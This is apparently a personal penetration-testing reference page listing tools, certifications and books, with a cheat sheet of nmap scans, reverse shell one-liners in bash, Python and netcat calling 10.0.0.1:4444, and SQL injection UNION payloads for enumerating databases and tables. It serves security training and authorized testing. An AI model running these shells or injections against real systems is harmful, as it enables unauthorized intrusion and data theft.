🎯 Welcome to my infosec knowledge base! Check out the About page to learn more →

Tools & Resources

A curated collection of security tools, learning resources, cheat sheets, and references I use regularly in my security work.

ℹ️ Info: This page is continuously updated with new tools and resources. Bookmark it for quick reference!

Essential Security Tools

Reconnaissance & Enumeration

Network Scanning:

Web Reconnaissance:

DNS & Subdomain Discovery:

Exploitation Frameworks

Web Application Testing

Proxies & Interceptors:

Scanners:

Password & Credential Attacks

Reverse Engineering & Binary Analysis

Privilege Escalation

Linux:

Windows:

Learning Resources

Capture The Flag (CTF) Platforms

Certifications

Beginner to Intermediate:

  • CompTIA Security+
  • CEH (Certified Ethical Hacker)
  • eJPT (eLearnSecurity Junior Penetration Tester)

Advanced:

  • OSCP (Offensive Security Certified Professional)
  • OSWE (Offensive Security Web Expert)
  • OSEP (Offensive Security Experienced Penetration Tester)
  • OSCE³ (Offensive Security Certified Expert)

Specialized:

  • GPEN (GIAC Penetration Tester)
  • GXPN (GIAC Exploit Researcher and Advanced Penetration Tester)
  • CRTO (Certified Red Team Operator)

Online Courses & Training

Books

Penetration Testing:

  • "The Hacker Playbook" series by Peter Kim
  • "Penetration Testing" by Georgia Weidman
  • "The Web Application Hacker's Handbook" by Dafydd Stuttard

Red Teaming:

  • "Red Team Development and Operations" by Joe Vest
  • "Operator Handbook" by Joshua Picolet

Binary Exploitation:

  • "Hacking: The Art of Exploitation" by Jon Erickson
  • "Practical Malware Analysis" by Michael Sikorski
  • "The Shellcoder's Handbook" by Chris Anley

Blogs & Communities

Cheat Sheets & References

Command References

Nmap Commands

# Quick TCP scan
nmap -sC -sV -oA output target
 
# Full port scan
nmap -p- --min-rate=1000 -oA full-scan target
 
# UDP scan
nmap -sU --top-ports 20 target
 
# Aggressive scan
nmap -A -T4 target

Reverse Shells

# Bash TCP
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
 
# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
 
# Netcat
nc -e /bin/sh 10.0.0.1 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f

SQL Injection

-- Basic union injection
' UNION SELECT NULL,NULL,NULL--
 
-- Database enumeration
' UNION SELECT schema_name,NULL FROM information_schema.schemata--
 
-- Table enumeration
' UNION SELECT table_name,NULL FROM information_schema.tables WHERE table_schema='database'--
 
-- Column enumeration
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--

Quick References

Useful Wordlists

Browser Extensions

  • Wappalyzer: Technology profiler
  • Cookie-Editor: Cookie manipulation
  • FoxyProxy: Proxy switching
  • Retire.js: JavaScript library vulnerability scanner

⚠️ Warning: Always ensure you have authorization before using these tools on any target. Unauthorized access is illegal.

Last updated: 2/3/2026

Have a tool or resource to suggest? Open an issue (opens in a new tab)!